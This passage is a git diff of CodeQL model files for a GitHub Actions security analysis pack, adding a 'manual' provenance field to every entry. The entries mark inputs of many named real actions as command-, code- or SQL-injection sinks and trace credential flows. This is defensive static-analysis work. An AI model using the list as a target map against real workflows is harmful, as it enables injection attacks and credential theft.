ql/lib/ext/py-actions_flake8.model.yml | 14 +++---- ...py-actions_py-dependency-install.model.yml | 2 +- ql/lib/ext/pyo3_maturin-action.model.yml | 8 ++-- ...vecircus_android-emulator-runner.model.yml | 38 +++++++++---------- ...bers-in-action_download-artifact.model.yml | 2 +- ql/lib/ext/reggionick_s3-deploy.model.yml | 16 ++++---- .../ext/renovatebot_github-action.model.yml | 10 ++--- .../ext/roots_issue-closer-action.model.yml | 4 +- ql/lib/ext/ros-tooling_setup-ros.model.yml | 2 +- ql/lib/ext/ruby_setup-ruby.model.yml | 4 +- ...ction-detect-and-tag-new-version.model.yml | 4 +- ...shallwefootball_upload-s3-action.model.yml | 2 +- .../shogo82148_actions-setup-perl.model.yml | 2 +- ...skitionek_notify-microsoft-teams.model.yml | 2 +- ql/lib/ext/snow-actions_eclint.model.yml | 2 +- .../ext/stackhawk_hawkscan-action.model.yml | 10 ++--- .../ext/step-security_harden-runner.model.yml | 2 +- .../suisei-cn_actions-download-file.model.yml | 2 +- ql/lib/ext/tibdex_backport.model.yml | 8 ++-- ql/lib/ext/timheuer_base64-to-file.model.yml | 4 +- ql/lib/ext/tj-actions_branch-names.model.yml | 6 +-- ql/lib/ext/tj-actions_changed-files.model.yml | 34 ++++++++--------- .../tj-actions_verify-changed-files.model.yml | 2 +- .../ext/trilom_file-changes-action.model.yml | 8 ++-- ...ss_conventional-changelog-action.model.yml | 20 +++++----- .../tryghost_action-deploy-theme.model.yml | 4 +- ql/lib/ext/tzkhan_pr-update-action.model.yml | 2 +- ql/lib/ext/veracode_veracode-sca.model.yml | 8 ++-- .../ext/wearerequired_lint-action.model.yml | 6 +-- ql/lib/ext/webfactory_ssh-agent.model.yml | 6 +-- .../xt0rted_slash-command-action.model.yml | 4 +- ql/lib/ext/zaproxy_action-baseline.model.yml | 8 ++-- ql/lib/ext/zaproxy_action-full-scan.model.yml | 8 ++-- 135 files changed, 359 insertions(+), 359 deletions(-) diff --git a/ql/lib/ext/8398a7_action-slack.model.yml b/ql/lib/ext/8398a7_action-slack.model.yml index e3d97adf69d..67455900ec3 100644 --- a/ql/lib/ext/8398a7_action-slack.model.yml +++ b/ql/lib/ext/8398a7_action-slack.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["8398a7/action-slack", "*", "input.custom_payload", "code-injection"] \ No newline at end of file + - ["8398a7/action-slack", "*", "input.custom_payload", "code-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/TEST-RW-MODELS.model.yml b/ql/lib/ext/TEST-RW-MODELS.model.yml index 4ff387b1c5a..65952bccb35 100644 --- a/ql/lib/ext/TEST-RW-MODELS.model.yml +++ b/ql/lib/ext/TEST-RW-MODELS.model.yml @@ -3,15 +3,15 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["octo-org/this-repo/.github/workflows/workflow.yml", "*", "input.config-path", "output.workflow-output", "taint"] - - ["octo-org/summary-repo/.github/workflows/workflow.yml", "*", "input.config-path", "output.workflow-output", "taint"] + - ["octo-org/this-repo/.github/workflows/workflow.yml", "*", "input.config-path", "output.workflow-output", "taint", "manual"] + - ["octo-org/summary-repo/.github/workflows/workflow.yml", "*", "input.config-path", "output.workflow-output", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["octo-org/source-repo/.github/workflows/workflow.yml", "*", "output.workflow-output", "Foo"] + - ["octo-org/source-repo/.github/workflows/workflow.yml", "*", "output.workflow-output", "Foo", "manual"] - addsTo: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["octo-org/sink-repo/.github/workflows/workflow.yml", "*", "input.config-path", "code-injection"] + - ["octo-org/sink-repo/.github/workflows/workflow.yml", "*", "input.config-path", "code-injection", "manual"] diff --git a/ql/lib/ext/actions_github-script.model.yml b/ql/lib/ext/actions_github-script.model.yml index cd409f38b59..9b36680af8f 100644 --- a/ql/lib/ext/actions_github-script.model.yml +++ b/ql/lib/ext/actions_github-script.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["actions/github-script", "*", "input.script", "code-injection"] + - ["actions/github-script", "*", "input.script", "code-injection", "manual"] diff --git a/ql/lib/ext/ahmadnassri_action-changed-files.model.yml b/ql/lib/ext/ahmadnassri_action-changed-files.model.yml index aabd5a3ce36..63e99abd4d3 100644 --- a/ql/lib/ext/ahmadnassri_action-changed-files.model.yml +++ b/ql/lib/ext/ahmadnassri_action-changed-files.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["ahmadnassri/action-changed-files", "*", "output.files", "PR changed files"] - - ["ahmadnassri/action-changed-files", "*", "output.json", "PR changed files"] + - ["ahmadnassri/action-changed-files", "*", "output.files", "PR changed files", "manual"] + - ["ahmadnassri/action-changed-files", "*", "output.json", "PR changed files", "manual"] diff --git a/ql/lib/ext/akhileshns_heroku-deploy.model.yml b/ql/lib/ext/akhileshns_heroku-deploy.model.yml index ad65775e58d..41b67c2a625 100644 --- a/ql/lib/ext/akhileshns_heroku-deploy.model.yml +++ b/ql/lib/ext/akhileshns_heroku-deploy.model.yml @@ -3,19 +3,19 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["akhileshns/heroku-deploy", "*", "input.branch", "output.status", "taint"] + - ["akhileshns/heroku-deploy", "*", "input.branch", "output.status", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["akhileshns/heroku-deploy", "*", "input.heroku_app_name", "command-injection"] - - ["akhileshns/heroku-deploy", "*", "input.buildpack", "command-injection"] - - ["akhileshns/heroku-deploy", "*", "input.region", "command-injection"] - - ["akhileshns/heroku-deploy", "*", "input.stack", "command-injection"] - - ["akhileshns/heroku-deploy", "*", "input.team", "command-injection"] - - ["akhileshns/heroku-deploy", "*", "input.docker_heroku_process_type", "command-injection"] - - ["akhileshns/heroku-deploy", "*", "input.docker_build_args", "command-injection"] - - ["akhileshns/heroku-deploy", "*", "input.branch", "command-injection"] - - ["akhileshns/heroku-deploy", "*", "input.appdir", "command-injection"] - - ["akhileshns/heroku-deploy", "*", "input.heroku_api_key", "command-injection"] - - ["akhileshns/heroku-deploy", "*", "input.heroku_email", "command-injection"] + - ["akhileshns/heroku-deploy", "*", "input.heroku_app_name", "command-injection", "manual"] + - ["akhileshns/heroku-deploy", "*", "input.buildpack", "command-injection", "manual"] + - ["akhileshns/heroku-deploy", "*", "input.region", "command-injection", "manual"] + - ["akhileshns/heroku-deploy", "*", "input.stack", "command-injection", "manual"] + - ["akhileshns/heroku-deploy", "*", "input.team", "command-injection", "manual"] + - ["akhileshns/heroku-deploy", "*", "input.docker_heroku_process_type", "command-injection", "manual"] + - ["akhileshns/heroku-deploy", "*", "input.docker_build_args", "command-injection", "manual"] + - ["akhileshns/heroku-deploy", "*", "input.branch", "command-injection", "manual"] + - ["akhileshns/heroku-deploy", "*", "input.appdir", "command-injection", "manual"] + - ["akhileshns/heroku-deploy", "*", "input.heroku_api_key", "command-injection", "manual"] + - ["akhileshns/heroku-deploy", "*", "input.heroku_email", "command-injection", "manual"] diff --git a/ql/lib/ext/amannn_action-semantic-pull-request.model.yml b/ql/lib/ext/amannn_action-semantic-pull-request.model.yml index 638ff449735..f2b8c8549a9 100644 --- a/ql/lib/ext/amannn_action-semantic-pull-request.model.yml +++ b/ql/lib/ext/amannn_action-semantic-pull-request.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["amannn/action-semantic-pull-request", "*", "output.error_message", "PR title"] + - ["amannn/action-semantic-pull-request", "*", "output.error_message", "PR title", "manual"] diff --git a/ql/lib/ext/anchore_sbom-action.model.yml b/ql/lib/ext/anchore_sbom-action.model.yml index c632a3a1ff2..7cb2e10e926 100644 --- a/ql/lib/ext/anchore_sbom-action.model.yml +++ b/ql/lib/ext/anchore_sbom-action.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["anchore/sbom-action", "*", "input.syft-version", "command-injection"] - - ["anchore/sbom-action", "*", "input.format", "command-injection"] - - ["anchore/sbom-action", "*", "input.path", "command-injection"] - - ["anchore/sbom-action", "*", "input.file", "command-injection"] - - ["anchore/sbom-action", "*", "input.image", "command-injection"] + - ["anchore/sbom-action", "*", "input.syft-version", "command-injection", "manual"] + - ["anchore/sbom-action", "*", "input.format", "command-injection", "manual"] + - ["anchore/sbom-action", "*", "input.path", "command-injection", "manual"] + - ["anchore/sbom-action", "*", "input.file", "command-injection", "manual"] + - ["anchore/sbom-action", "*", "input.image", "command-injection", "manual"] diff --git a/ql/lib/ext/anchore_scan-action.model.yml b/ql/lib/ext/anchore_scan-action.model.yml index 26e5adea505..83f09bc6bde 100644 --- a/ql/lib/ext/anchore_scan-action.model.yml +++ b/ql/lib/ext/anchore_scan-action.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["anchore/scan-action", "*", "input.grype-version", "command-injection"] + - ["anchore/scan-action", "*", "input.grype-version", "command-injection", "manual"] diff --git a/ql/lib/ext/andresz1_size-limit-action.model.yml b/ql/lib/ext/andresz1_size-limit-action.model.yml index 2903888a731..bdd8a8f77c9 100644 --- a/ql/lib/ext/andresz1_size-limit-action.model.yml +++ b/ql/lib/ext/andresz1_size-limit-action.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["andresz1/size-limit-action", "*", "input.package_manager", "command-injection"] - - ["andresz1/size-limit-action", "*", "input.build_script", "command-injection"] - - ["andresz1/size-limit-action", "*", "input.script", "command-injection"] - - ["andresz1/size-limit-action", "*", "input.clean_script", "command-injection"] + - ["andresz1/size-limit-action", "*", "input.package_manager", "command-injection", "manual"] + - ["andresz1/size-limit-action", "*", "input.build_script", "command-injection", "manual"] + - ["andresz1/size-limit-action", "*", "input.script", "command-injection", "manual"] + - ["andresz1/size-limit-action", "*", "input.clean_script", "command-injection", "manual"] diff --git a/ql/lib/ext/android-actions_setup-android.model.yml b/ql/lib/ext/android-actions_setup-android.model.yml index 5ecd36f0926..7e5f5c9ee6a 100644 --- a/ql/lib/ext/android-actions_setup-android.model.yml +++ b/ql/lib/ext/android-actions_setup-android.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["android-actions/setup-android", "*", "input.cmdline-tools-version", "output.ANDROID_COMMANDLINE_TOOLS_VERSION", "taint"] + - ["android-actions/setup-android", "*", "input.cmdline-tools-version", "output.ANDROID_COMMANDLINE_TOOLS_VERSION", "taint", "manual"] diff --git a/ql/lib/ext/apple-actions_import-codesign-certs.model.yml b/ql/lib/ext/apple-actions_import-codesign-certs.model.yml index b81f5c17ca2..8daa9a9c2b3 100644 --- a/ql/lib/ext/apple-actions_import-codesign-certs.model.yml +++ b/ql/lib/ext/apple-actions_import-codesign-certs.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["apple-actions/import-codesign-certs", "*", "input.keychain-password", "output.keychain-password", "taint"] + - ["apple-actions/import-codesign-certs", "*", "input.keychain-password", "output.keychain-password", "taint", "manual"] diff --git a/ql/lib/ext/asdf-vm_actions.model.yml b/ql/lib/ext/asdf-vm_actions.model.yml index 21dcd22c8b7..80502e487b8 100644 --- a/ql/lib/ext/asdf-vm_actions.model.yml +++ b/ql/lib/ext/asdf-vm_actions.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["asdf-vm/actions", "*", "input.before_install", "command-injection"] \ No newline at end of file + - ["asdf-vm/actions", "*", "input.before_install", "command-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml b/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml index 5ab9fee1667..2a26d31feac 100644 --- a/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml +++ b/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["ashley-taylor/read-json-property-action", "*", "input.json", "output.value", "taint"] + - ["ashley-taylor/read-json-property-action", "*", "input.json", "output.value", "taint", "manual"] diff --git a/ql/lib/ext/ashley-taylor_regex-property-action.model.yml b/ql/lib/ext/ashley-taylor_regex-property-action.model.yml index a6e1364d218..82e81f55816 100644 --- a/ql/lib/ext/ashley-taylor_regex-property-action.model.yml +++ b/ql/lib/ext/ashley-taylor_regex-property-action.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["ashley-taylor/regex-property-action", "*", "input.replacement", "output.value", "taint"] - - ["ashley-taylor/regex-property-action", "*", "input.value", "output.value", "taint"] + - ["ashley-taylor/regex-property-action", "*", "input.replacement", "output.value", "taint", "manual"] + - ["ashley-taylor/regex-property-action", "*", "input.value", "output.value", "taint", "manual"] diff --git a/ql/lib/ext/aszc_change-string-case-action.model.yml b/ql/lib/ext/aszc_change-string-case-action.model.yml index cfdbb0b825f..58554eb3f61 100644 --- a/ql/lib/ext/aszc_change-string-case-action.model.yml +++ b/ql/lib/ext/aszc_change-string-case-action.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["aszc/change-string-case-action", "*", "input.string", "output.capitalized", "taint"] - - ["aszc/change-string-case-action", "*", "input.replace-with", "output.uppercase", "taint"] - - ["aszc/change-string-case-action", "*", "input.replace-with", "output.lowercase", "taint"] + - ["aszc/change-string-case-action", "*", "input.string", "output.capitalized", "taint", "manual"] + - ["aszc/change-string-case-action", "*", "input.replace-with", "output.uppercase", "taint", "manual"] + - ["aszc/change-string-case-action", "*", "input.replace-with", "output.lowercase", "taint", "manual"] diff --git a/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml b/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml index 26b3a1fd3df..ca99210b4c2 100644 --- a/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml +++ b/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml @@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["aws-actions/configure-aws-credentials", "*", "input.aws-access-key-id", "env.AWS_ACCESS_KEY_ID", "taint"] - - ["aws-actions/configure-aws-credentials", "*", "input.aws-access-key-id", "secret.AWS_ACCESS_KEY_ID", "taint"] - - ["aws-actions/configure-aws-credentials", "*", "input.aws-secret-access-key", "env.AWS_SECRET_ACCESS_KEY", "taint"] - - ["aws-actions/configure-aws-credentials", "*", "input.aws-secret-access-key", "secret.AWS_SECRET_ACCESS_KEY", "taint"] - - ["aws-actions/configure-aws-credentials", "*", "input.aws-session-token", "env.AWS_SESSION_TOKEN", "taint"] - - ["aws-actions/configure-aws-credentials", "*", "input.aws-session-token", "secret.AWS_SESSION_TOKEN", "taint"] + - ["aws-actions/configure-aws-credentials", "*", "input.aws-access-key-id", "env.AWS_ACCESS_KEY_ID", "taint", "manual"] + - ["aws-actions/configure-aws-credentials", "*", "input.aws-access-key-id", "secret.AWS_ACCESS_KEY_ID", "taint", "manual"] + - ["aws-actions/configure-aws-credentials", "*", "input.aws-secret-access-key", "env.AWS_SECRET_ACCESS_KEY", "taint", "manual"] + - ["aws-actions/configure-aws-credentials", "*", "input.aws-secret-access-key", "secret.AWS_SECRET_ACCESS_KEY", "taint", "manual"] + - ["aws-actions/configure-aws-credentials", "*", "input.aws-session-token", "env.AWS_SESSION_TOKEN", "taint", "manual"] + - ["aws-actions/configure-aws-credentials", "*", "input.aws-session-token", "secret.AWS_SESSION_TOKEN", "taint", "manual"] diff --git a/ql/lib/ext/axel-op_googlejavaformat-action.model.yml b/ql/lib/ext/axel-op_googlejavaformat-action.model.yml index 236eade34a6..1563d95b0b1 100644 --- a/ql/lib/ext/axel-op_googlejavaformat-action.model.yml +++ b/ql/lib/ext/axel-op_googlejavaformat-action.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["axel-op/googlejavaformat-action", "*", "input.commitMessage", "command-injection"] - - ["axel-op/googlejavaformat-action", "*", "input.commit-message", "command-injection"] + - ["axel-op/googlejavaformat-action", "*", "input.commitMessage", "command-injection", "manual"] + - ["axel-op/googlejavaformat-action", "*", "input.commit-message", "command-injection", "manual"] diff --git a/ql/lib/ext/azure_powershell.model.yml b/ql/lib/ext/azure_powershell.model.yml index c0e11c8201f..2bb6000355d 100644 --- a/ql/lib/ext/azure_powershell.model.yml +++ b/ql/lib/ext/azure_powershell.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["azure/powershell", "*", "input.azPSVersion", "command-injection"] + - ["azure/powershell", "*", "input.azPSVersion", "command-injection", "manual"] diff --git a/ql/lib/ext/bahmutov_npm-install.model.yml b/ql/lib/ext/bahmutov_npm-install.model.yml index 2841f406bda..b0c3419abe9 100644 --- a/ql/lib/ext/bahmutov_npm-install.model.yml +++ b/ql/lib/ext/bahmutov_npm-install.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["bahmutov/npm-install", "*", "input.install-command", "command-injection"] + - ["bahmutov/npm-install", "*", "input.install-command", "command-injection", "manual"] diff --git a/ql/lib/ext/blackducksoftware_github-action.model.yml b/ql/lib/ext/blackducksoftware_github-action.model.yml index aa060de610d..cbe593690e4 100644 --- a/ql/lib/ext/blackducksoftware_github-action.model.yml +++ b/ql/lib/ext/blackducksoftware_github-action.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["blackducksoftware/github-action", "*", "input.args", "command-injection"] - - ["blackducksoftware/github-action", "*", "input.blackduck.url", "command-injection"] - - ["blackducksoftware/github-action", "*", "input.blackduck.api.token", "command-injection"] + - ["blackducksoftware/github-action", "*", "input.args", "command-injection", "manual"] + - ["blackducksoftware/github-action", "*", "input.blackduck.url", "command-injection", "manual"] + - ["blackducksoftware/github-action", "*", "input.blackduck.api.token", "command-injection", "manual"] diff --git a/ql/lib/ext/bobheadxi_deployments.model.yml b/ql/lib/ext/bobheadxi_deployments.model.yml index 2d8932d87fb..f29355d4882 100644 --- a/ql/lib/ext/bobheadxi_deployments.model.yml +++ b/ql/lib/ext/bobheadxi_deployments.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["bobheadxi/deployments", "*", "input.env", "output.env", "taint"] + - ["bobheadxi/deployments", "*", "input.env", "output.env", "taint", "manual"] diff --git a/ql/lib/ext/bufbuild_buf-breaking-action.model.yml b/ql/lib/ext/bufbuild_buf-breaking-action.model.yml index 7d5f699a0e9..8463ed9577b 100644 --- a/ql/lib/ext/bufbuild_buf-breaking-action.model.yml +++ b/ql/lib/ext/bufbuild_buf-breaking-action.model.yml @@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["bufbuild/buf-breaking-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint"] + - ["bufbuild/buf-breaking-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["bufbuild/buf-breaking-action", "*", "input.input", "command-injection"] - - ["bufbuild/buf-breaking-action", "*", "input.against", "command-injection"] + - ["bufbuild/buf-breaking-action", "*", "input.input", "command-injection", "manual"] + - ["bufbuild/buf-breaking-action", "*", "input.against", "command-injection", "manual"] diff --git a/ql/lib/ext/bufbuild_buf-lint-action.model.yml b/ql/lib/ext/bufbuild_buf-lint-action.model.yml index aeda7998631..f20a877c3d2 100644 --- a/ql/lib/ext/bufbuild_buf-lint-action.model.yml +++ b/ql/lib/ext/bufbuild_buf-lint-action.model.yml @@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["bufbuild/buf-lint-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint"] + - ["bufbuild/buf-lint-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["bufbuild/buf-lint-action", "*", "input.input", "command-injection"] + - ["bufbuild/buf-lint-action", "*", "input.input", "command-injection", "manual"] diff --git a/ql/lib/ext/bufbuild_buf-setup-action.model.yml b/ql/lib/ext/bufbuild_buf-setup-action.model.yml index 38b18cf6cac..e0fe96ff915 100644 --- a/ql/lib/ext/bufbuild_buf-setup-action.model.yml +++ b/ql/lib/ext/bufbuild_buf-setup-action.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["bufbuild/buf-setup-action", "*", "input.buf_domain", "command-injection"] - - ["bufbuild/buf-setup-action", "*", "input.buf_user", "command-injection"] + - ["bufbuild/buf-setup-action", "*", "input.buf_domain", "command-injection", "manual"] + - ["bufbuild/buf-setup-action", "*", "input.buf_user", "command-injection", "manual"] diff --git a/ql/lib/ext/cachix_cachix-action.model.yml b/ql/lib/ext/cachix_cachix-action.model.yml index 2e4291eb480..a7489b68688 100644 --- a/ql/lib/ext/cachix_cachix-action.model.yml +++ b/ql/lib/ext/cachix_cachix-action.model.yml @@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["cachix/cachix-action", "*", "input.signingKey", "env.CACHIX_SIGNING_KEY", "taint"] + - ["cachix/cachix-action", "*", "input.signingKey", "env.CACHIX_SIGNING_KEY", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["cachix/cachix-action", "*", "input.installCommand", "command-injection"] - - ["cachix/cachix-action", "*", "input.cachixBin", "command-injection"] \ No newline at end of file + - ["cachix/cachix-action", "*", "input.installCommand", "command-injection", "manual"] + - ["cachix/cachix-action", "*", "input.cachixBin", "command-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/changesets_action.model.yml b/ql/lib/ext/changesets_action.model.yml index 3be7669275c..c0a18c36465 100644 --- a/ql/lib/ext/changesets_action.model.yml +++ b/ql/lib/ext/changesets_action.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["changesets/action", "*", "input.publish", "command-injection"] - - ["changesets/action", "*", "input.version", "command-injection"] + - ["changesets/action", "*", "input.publish", "command-injection", "manual"] + - ["changesets/action", "*", "input.version", "command-injection", "manual"] diff --git a/ql/lib/ext/cloudflare_wrangler-action.model.yml b/ql/lib/ext/cloudflare_wrangler-action.model.yml index cb0870b4883..79ed7a80437 100644 --- a/ql/lib/ext/cloudflare_wrangler-action.model.yml +++ b/ql/lib/ext/cloudflare_wrangler-action.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["cloudflare/wrangler-action", "*", "input.preCommands", "command-injection"] - - ["cloudflare/wrangler-action", "*", "input.postCommands", "command-injection"] + - ["cloudflare/wrangler-action", "*", "input.preCommands", "command-injection", "manual"] + - ["cloudflare/wrangler-action", "*", "input.postCommands", "command-injection", "manual"] diff --git a/ql/lib/ext/coursier_cache-action.model.yml b/ql/lib/ext/coursier_cache-action.model.yml index bfb45dddb66..550b5b854ed 100644 --- a/ql/lib/ext/coursier_cache-action.model.yml +++ b/ql/lib/ext/coursier_cache-action.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["coursier/cache-action", "*", "input.path", "env.COURSIER_CACHE", "taint"] + - ["coursier/cache-action", "*", "input.path", "env.COURSIER_CACHE", "taint", "manual"] diff --git a/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml b/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml index 30e59e91d60..bbe88611259 100644 --- a/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml +++ b/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["crazy-max/ghaction-chocolatey", "*", "input.args", "command-injection"] + - ["crazy-max/ghaction-chocolatey", "*", "input.args", "command-injection", "manual"] diff --git a/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml b/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml index f3b021d226b..83b3bc3520d 100644 --- a/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml +++ b/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["crazy-max/ghaction-import-gpg", "*", "input.fingerprint", "output.fingerprint", "taint"] \ No newline at end of file + - ["crazy-max/ghaction-import-gpg", "*", "input.fingerprint", "output.fingerprint", "taint", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/csexton_release-asset-action.model.yml b/ql/lib/ext/csexton_release-asset-action.model.yml index 60e35e66a4d..3b0642fece4 100644 --- a/ql/lib/ext/csexton_release-asset-action.model.yml +++ b/ql/lib/ext/csexton_release-asset-action.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["csexton/release-asset-action", "*", "input.release-url", "output.url", "taint"] + - ["csexton/release-asset-action", "*", "input.release-url", "output.url", "taint", "manual"] diff --git a/ql/lib/ext/cycjimmy_semantic-release-action.model.yml b/ql/lib/ext/cycjimmy_semantic-release-action.model.yml index 25df02dacaa..db55d3c6f3a 100644 --- a/ql/lib/ext/cycjimmy_semantic-release-action.model.yml +++ b/ql/lib/ext/cycjimmy_semantic-release-action.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["cycjimmy/semantic-release-action", "*", "input.semantic_version", "command-injection"] - - ["cycjimmy/semantic-release-action", "*", "input.extra_plugins", "command-injection"] - - ["cycjimmy/semantic-release-action", "*", "input.extends", "command-injection"] + - ["cycjimmy/semantic-release-action", "*", "input.semantic_version", "command-injection", "manual"] + - ["cycjimmy/semantic-release-action", "*", "input.extra_plugins", "command-injection", "manual"] + - ["cycjimmy/semantic-release-action", "*", "input.extends", "command-injection", "manual"] diff --git a/ql/lib/ext/cypress-io_github-action.model.yml b/ql/lib/ext/cypress-io_github-action.model.yml index 0aaa1b0722a..21688675a2e 100644 --- a/ql/lib/ext/cypress-io_github-action.model.yml +++ b/ql/lib/ext/cypress-io_github-action.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["cypress-io/github-action", "*", "env.GH_BRANCH", "PR branch"] + - ["cypress-io/github-action", "*", "env.GH_BRANCH", "PR branch", "manual"] diff --git a/ql/lib/ext/dailydotdev_action-devcard.model.yml b/ql/lib/ext/dailydotdev_action-devcard.model.yml index 324171f3c4b..46226863687 100644 --- a/ql/lib/ext/dailydotdev_action-devcard.model.yml +++ b/ql/lib/ext/dailydotdev_action-devcard.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["dailydotdev/action-devcard", "*", "input.commit_branch", "sql-injection"] - - ["dailydotdev/action-devcard", "*", "input.commit_filename", "sql-injection"] + - ["dailydotdev/action-devcard", "*", "input.commit_branch", "sql-injection", "manual"] + - ["dailydotdev/action-devcard", "*", "input.commit_filename", "sql-injection", "manual"] diff --git a/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml b/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml index cc5c311eea7..afe3e82ca1f 100644 --- a/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml +++ b/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["danielpalme/reportgenerator-github-action", "*", "input.toolpath", "command-injection"] + - ["danielpalme/reportgenerator-github-action", "*", "input.toolpath", "command-injection", "manual"] diff --git a/ql/lib/ext/daspn_private-actions-checkout.model.yml b/ql/lib/ext/daspn_private-actions-checkout.model.yml index f45aae02158..5b0a9dab38d 100644 --- a/ql/lib/ext/daspn_private-actions-checkout.model.yml +++ b/ql/lib/ext/daspn_private-actions-checkout.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["daspn/private-actions-checkout", "*", "input.actions_list", "command-injection"] - - ["daspn/private-actions-checkout", "*", "input.checkout_base_path", "command-injection"] + - ["daspn/private-actions-checkout", "*", "input.actions_list", "command-injection", "manual"] + - ["daspn/private-actions-checkout", "*", "input.checkout_base_path", "command-injection", "manual"] diff --git a/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml b/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml index 7445d673fcf..35bbd72f0a4 100644 --- a/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml +++ b/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["dawidd6/action-ansible-playbook", "*", "input.playbook", "command-injection"] - - ["dawidd6/action-ansible-playbook", "*", "input.options", "command-injection"] + - ["dawidd6/action-ansible-playbook", "*", "input.playbook", "command-injection", "manual"] + - ["dawidd6/action-ansible-playbook", "*", "input.options", "command-injection", "manual"] diff --git a/ql/lib/ext/dawidd6_action-download-artifact.model.yml b/ql/lib/ext/dawidd6_action-download-artifact.model.yml index 3bc1dcc4759..f90eaeb7271 100644 --- 